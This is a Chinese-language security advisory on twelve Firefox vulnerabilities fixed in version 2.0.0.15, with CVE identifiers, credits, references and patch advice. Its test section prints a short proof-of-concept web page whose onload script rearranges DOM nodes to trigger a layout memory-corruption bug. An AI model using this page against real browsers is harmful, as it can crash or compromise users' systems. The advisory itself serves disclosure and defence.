安全研究
安全漏洞
Mozilla Firefox 2.0.0.15版本修复多个安全漏洞
发布日期:2008-07-01
更新日期:2008-07-03
受影响系统:
Mozilla Firefox < 2.0.0.15不受影响系统:
Mozilla Firefox 2.0.0.15描述:
BUGTRAQ ID: 30038
CVE(CAN) ID: CVE-2008-2798,CVE-2008-2799,CVE-2008-2800,CVE-2008-2801,CVE-2008-2802,CVE-2008-2803,CVE-2008-2805,CVE-2008-2806,CVE-2008-2807,CVE-2008-2808,CVE-2008-2809,CVE-2008-2810,CVE-2008-2811
Firefox是Mozilla所发布的开源WEB浏览器。
Firefox中的多个安全漏洞允许恶意用户泄露敏感信息、绕过安全限制、执行欺骗攻击或入侵用户系统。由于代码共享,Thunderbird和SeaMonkey也受这些漏洞的影响。
1) 网页布局和JavaScript引擎中的多个漏洞可能导致内存破坏。
2) 处理非特权XUL文档中的漏洞可能导致通过<script>单元从fastload文件加载Chrome脚本。
3) mozIJSSubScriptLoader.LoadScript()函数中的漏洞可能导致绕过XPCNativeWrappers以Chrome权限执行任意代码。成功攻击要求安装了使用该函数的附加软件。
4) 块回流进程中的漏洞可能导致崩溃或执行任意代码。
5) 处理本地目录列表中所包含的文件URL方式中的漏洞可能导致执行恶意JavaScript内容。
6) JavaScript实现同源策略方式中的多个漏洞可能导致以不同域的环境执行任意脚本代码。
7) 验证签名的JAR文件中的多个漏洞可能导致以JAR签名者的权限执行任意JavaScript代码。
8) 实现文件上传表单方式中的漏洞可能导致通过特制的DOM Range和originalTarget单元向远程web服务器上传本地文件。
9) Java LiveConnect在Mac OS X平台上实现中的漏洞可能导致创建任意套接字连接。
10) 在处理不正确编码的.properties文件时存在未初始化内存访问漏洞,可能导致通过附加软件泄露敏感内存。
11) 在处理由对等的可信任证书所提供的Alt Names属性方式中的漏洞可能导致执行欺骗攻击。
12) 处理Windows URL快捷方式中的路段可能导致以本地文件的权限运行远程站点。成功利用这个漏洞要求诱骗用户下载并打开恶意的Windows URL快捷方式。
<*来源:moz_bug_r_a4 (moz_bug_r_a4@yahoo.com)
Greg McManus
Masahiro Yamada (masa141421356@gmail.com)
Collin Jackson (collinj@cs.stanford.edu)
链接:http://secunia.com/advisories/30911/
http://www.mozilla.org/security/announce/2008/mfsa2008-22.html
http://www.mozilla.org/security/announce/2008/mfsa2008-23.html
http://www.mozilla.org/security/announce/2008/mfsa2008-24.html
http://www.mozilla.org/security/announce/2008/mfsa2008-25.html
http://www.mozilla.org/security/announce/2008/mfsa2008-27.html
http://www.mozilla.org/security/announce/2008/mfsa2008-28.html
http://www.mozilla.org/security/announce/2008/mfsa2008-29.html
http://www.mozilla.org/security/announce/2008/mfsa2008-30.html
http://www.mozilla.org/security/announce/2008/mfsa2008-32.html
http://www.mozilla.org/security/announce/2008/mfsa2008-33.html
http://www.mozilla.org/security/announce/2008/mfsa2008-31.html
https://www.redhat.com/support/errata/RHSA-2008-0547.html
https://www.redhat.com/support/errata/RHSA-2008-0549.html
https://www.redhat.com/support/errata/RHSA-2008-0569.html
http://security.gentoo.org/glsa/glsa-200808-03.xml
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<head>
<title></title>
<script language="JavaScript">
function run() {
document.all(0).appendChild(document.all(5));
document.all(1).appendChild(document.all(5));
document.all(1).appendChild(document.all(8));
document.all(2).scrollIntoView(false);
document.all(2).appendChild(document.all(9));
document.all(2).appendChild(document.all(7));
}
</script>
</head>
<body onload="javascript: run();">
<b></b>
<s></s>
<b></b>
<b></b>
<b></b>
<b></b>
<img border="35791400" align="left" src="http://www.google.es/intl/en_com/images/logo_plain.png">
</img>
</body>
</html>
建议:
临时解决方法:
* 禁用JavaScript。
厂商补丁:
Mozilla
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.mozilla.com/en-US/firefox/all.html
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2008:0569-01)以及相应补丁:
RHSA-2008:0569-01:Critical: firefox security update
链接:https://www.redhat.com/support/errata/RHSA-2008-0569.html
Gentoo
------
Gentoo已经为此发布了一个安全公告(GLSA-200808-03)以及相应补丁:
GLSA-200808-03:Mozilla products: Multiple vulnerabilities
链接:http://security.gentoo.org/glsa/glsa-200808-03.xml
浏览次数:2606
严重程度:0(网友投票)
绿盟科技给您安全的保障
